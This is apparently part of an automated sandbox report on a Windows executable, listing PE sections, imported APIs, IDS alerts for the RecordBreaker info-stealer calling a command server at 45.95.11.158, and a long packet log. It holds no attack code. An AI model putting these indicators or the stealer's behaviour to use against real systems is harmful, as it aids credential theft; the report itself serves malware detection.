BSS	0x29000	0x10f5	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2b000	0x1798	0x1800	False	0.3977864583333333	data	4.885545060649106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x2d000	0x8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x2e000	0x18	0x200	False	0.05078125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x2f000	0x1884	0x1a00	False	0.7889122596153846	data	6.586647864611828	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x31000	0x1cdc	0x1e00	False	0.3592447916666667	data	4.75165483227057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x31270	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x31398	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x31900	0x2e8	data
RT_ICON	0x31be8	0x8a8	data
RT_RCDATA	0x32490	0x10	data
RT_RCDATA	0x324a0	0x110	data
RT_GROUP_ICON	0x325b0	0x3e	data
RT_VERSION	0x325f0	0x374	data	Russian	Russia
RT_MANIFEST	0x32964	0x376	XML 1.0 document, ASCII text, with CRLF line terminators	Russian	Russia

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, MessageBoxA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegCloseKey, OpenThreadToken, OpenProcessToken, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid, AdjustTokenPrivileges
kernel32.dll	WriteFile, WinExec, WaitForSingleObject, TerminateProcess, SystemTimeToFileTime, Sleep, SetFileTime, SetFilePointer, SetErrorMode, SetEndOfFile, ReadFile, OpenProcess, MultiByteToWideChar, LocalFileTimeToFileTime, LoadLibraryA, GlobalFree, GlobalAlloc, GetVersion, GetUserDefaultLangID, GetProcAddress, GetModuleHandleA, GetLocalTime, GetLastError, GetFileTime, GetFileSize, GetExitCodeProcess, GetCurrentThread, GetCurrentProcess, FreeLibrary, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, DosDateTimeToFileTime, CompareFileTime, CloseHandle
gdi32.dll	StretchDIBits, StretchBlt, SetWindowOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetDIBits, SetBrushOrgEx, SetBkMode, SetBkColor, SelectObject, SaveDC, RestoreDC, OffsetRgn, MoveToEx, IntersectClipRect, GetStockObject, GetPixel, GetDIBits, ExtSelectClipRgn, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CombineRgn, BitBlt
user32.dll	WaitMessage, ValidateRect, TranslateMessage, ShowWindow, SetWindowPos, SetTimer, SetParent, SetForegroundWindow, SetFocus, SetCursor, SendMessageA, ScreenToClient, ReleaseDC, PostQuitMessage, OffsetRect, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsIconic, InvalidateRect, GetWindowRgn, GetWindowRect, GetWindowDC, GetUpdateRgn, GetSystemMetrics, GetSystemMenu, GetSysColor, GetParent, GetWindow, GetKeyState, GetFocus, GetDCEx, GetDC, GetCursorPos, GetClientRect, GetCapture, FillRect, ExitWindowsEx, EnumWindows, EndPaint, EnableWindow, EnableMenuItem, DrawIcon, DestroyWindow, DestroyIcon, DeleteMenu, CopyImage, ClientToScreen, BeginPaint, CharLowerBuffA
winmm.dll	timeKillEvent, timeSetEvent
oleaut32.dll	SysAllocStringLen
ole32.dll	OleInitialize
comctl32.dll	ImageList_Draw, ImageList_SetBkColor, ImageList_Create, InitCommonControls
shell32.dll	SHGetFileInfoA
user32.dll	wvsprintfA, SetWindowLongA, SetPropA, SendMessageA, RemovePropA, RegisterClassA, PostMessageA, PeekMessageA, MessageBoxA, LoadIconA, LoadCursorA, GetWindowTextLengthA, GetWindowTextA, GetWindowLongA, GetPropA, GetClassLongA, GetClassInfoA, FindWindowA, DrawTextA, DispatchMessageA, DefWindowProcA, CreateWindowExA, CallWindowProcA
gdi32.dll	GetTextExtentPoint32A, GetObjectA, CreateFontIndirectA, AddFontResourceA
kernel32.dll	WritePrivateProfileStringA, SetFileAttributesA, SetCurrentDirectoryA, RemoveDirectoryA, LoadLibraryA, GetWindowsDirectoryA, GetVersionExA, GetTimeFormatA, GetTempPathA, GetSystemDirectoryA, GetShortPathNameA, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetComputerNameA, GetCommandLineA, FindNextFileA, FindFirstFileA, ExpandEnvironmentStringsA, DeleteFileA, CreateFileA, CreateDirectoryA, CompareStringA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegEnumKeyExA, RegCreateKeyExA, LookupPrivilegeValueA, GetUserNameA
shell32.dll	ShellExecuteExA, ShellExecuteA
cabinet.dll	FDIDestroy, FDICopy, FDICreate
ole32.dll	OleInitialize, CoTaskMemFree, CoCreateInstance, CoUninitialize, CoInitialize
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHChangeNotify, SHBrowseForFolderA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.345.95.11.15849827802038485 08/23/22-18:23:55.732951	TCP	2038485	ET TROJAN Win32/RecordBreaker - Observed UA M1	49827	80	192.168.2.3	45.95.11.158
192.168.2.345.95.11.15849827802038487 08/23/22-18:24:01.340150	TCP	2038487	ET TROJAN Win32/RecordBreaker - Library Request	49827	80	192.168.2.3	45.95.11.158
192.168.2.345.95.11.15849827802038486 08/23/22-18:24:01.340150	TCP	2038486	ET TROJAN Win32/RecordBreaker - Observed UA M2	49827	80	192.168.2.3	45.95.11.158
45.95.11.158192.168.2.380498272036955 08/23/22-18:23:55.913354	TCP	2036955	ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response	80	49827	45.95.11.158	192.168.2.3
192.168.2.345.95.11.15849827802036934 08/23/22-18:23:55.732951	TCP	2036934	ET TROJAN Win32/RecordBreaker CnC Checkin M1	49827	80	192.168.2.3	45.95.11.158

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2022 18:23:33.287640095 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.287683010 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:33.287765026 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.288018942 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.288069963 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.288150072 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.288506985 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.288547993 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.288645029 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.289176941 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:33.289221048 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:33.289387941 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:33.289807081 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.289860010 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.289948940 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.290177107 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.290218115 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.290339947 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.290802956 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.290841103 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.290932894 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.292006969 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.292040110 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:33.292227030 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.292254925 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.293425083 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:33.293466091 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:33.293589115 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:33.294003963 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.294045925 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.295583010 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:33.295603037 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:33.296195984 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.296230078 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.296694994 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.296727896 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.297025919 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.297059059 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.297365904 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:33.297388077 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:33.354240894 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.357198954 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.357597113 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.357630968 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.358062983 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.358092070 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.359210014 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.359215975 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.359373093 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.359858036 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:33.359908104 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.360352993 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.361248970 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:33.364212990 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:33.366863966 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:33.366903067 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:33.367166996 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.367208004 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:33.367716074 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.367743015 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.368010998 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:33.368120909 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.368151903 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:33.368231058 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:33.368890047 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.369000912 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.369260073 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:33.369353056 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.370587111 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:33.370625019 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:33.371891975 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:33.372028112 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:33.374778986 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.374975920 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.402132034 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.402173042 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.402693987 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.402748108 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.404618025 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.404733896 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.404937983 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.405375004 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.424361944 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.424427986 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.424544096 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.424972057 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.424992085 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.470237970 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.481055975 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.511277914 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.511312962 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.512530088 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.512546062 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.512653112 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.518770933 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.518840075 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.518928051 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.520406008 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.520447016 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.567971945 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.681008101 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.681803942 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.681828976 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.683794022 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.683816910 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.683900118 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.781023026 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.888634920 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.888693094 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.888768911 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.889013052 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.889043093 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.907567978 CEST	49763	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.907610893 CEST	443	49763	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.907710075 CEST	49763	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.908516884 CEST	49765	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.908559084 CEST	443	49765	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.908679962 CEST	49765	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.909140110 CEST	49763	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.909163952 CEST	443	49763	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.909832954 CEST	49766	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.909872055 CEST	443	49766	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.909940958 CEST	49766	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.910132885 CEST	49765	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.910156012 CEST	443	49765	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.910322905 CEST	49766	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.910341024 CEST	443	49766	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.937138081 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.955142975 CEST	443	49766	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.955235004 CEST	443	49765	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.956975937 CEST	443	49763	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.967140913 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.967202902 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.967603922 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.967850924 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:33.969079971 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.969191074 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:33.969222069 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:33.969233990 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.969540119 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:33.969711065 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:33.977426052 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:33.977494955 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:33.977957964 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.978105068 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.978166103 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.978295088 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.978574991 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:33.978895903 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.979007006 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:33.979083061 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.979183912 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.979232073 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.979676008 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.979851961 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.979878902 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:33.979904890 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:33.980093002 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.980341911 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.980591059 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.980726957 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.980731964 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.980850935 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.984052896 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.984097958 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.986407042 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.986459970 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.986598969 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.986625910 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.986738920 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.986778021 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.987118006 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.987205982 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.987235069 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.987600088 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.996973038 CEST	49763	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.997024059 CEST	443	49763	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.997222900 CEST	49765	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.997257948 CEST	443	49765	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.997502089 CEST	49766	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.997524977 CEST	443	49766	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.998722076 CEST	443	49766	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.998744965 CEST	443	49766	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.998809099 CEST	49766	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:33.999000072 CEST	443	49765	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.999020100 CEST	443	49765	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:33.999073029 CEST	49765	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.000372887 CEST	443	49763	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.000386953 CEST	443	49763	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.000439882 CEST	49763	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.003381968 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.003518105 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.004568100 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.004664898 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.006728888 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.006804943 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.012541056 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.012582064 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.013325930 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:34.013442039 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:34.013465881 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:34.013531923 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:34.013586044 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:34.014209986 CEST	49757	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.014236927 CEST	443	49757	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.015345097 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.015465975 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.025962114 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.026067019 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.026101112 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.026231050 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.026233912 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.026309967 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.035463095 CEST	49762	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.035494089 CEST	443	49762	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.040993929 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:34.041126013 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:34.041156054 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:34.041203022 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:34.059026957 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:34.059050083 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:34.059048891 CEST	49763	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.059053898 CEST	49765	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.074363947 CEST	49758	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.074431896 CEST	443	49758	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.074894905 CEST	49761	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.074928045 CEST	443	49761	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.075383902 CEST	49759	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.075416088 CEST	443	49759	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.077435970 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.077460051 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.079696894 CEST	49753	443	192.168.2.3	216.58.209.46
Aug 23, 2022 18:23:34.079735041 CEST	443	49753	216.58.209.46	192.168.2.3
Aug 23, 2022 18:23:34.081017017 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.081023932 CEST	49756	443	192.168.2.3	142.250.180.141
Aug 23, 2022 18:23:34.081051111 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:34.081063986 CEST	443	49756	142.250.180.141	192.168.2.3
Aug 23, 2022 18:23:34.159404993 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:34.181063890 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:34.518971920 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.519045115 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.519160986 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.519505024 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.519531012 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.621411085 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.632489920 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.632523060 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.633982897 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.635143995 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.635344028 CEST	443	49768	148.251.234.83	192.168.2.3
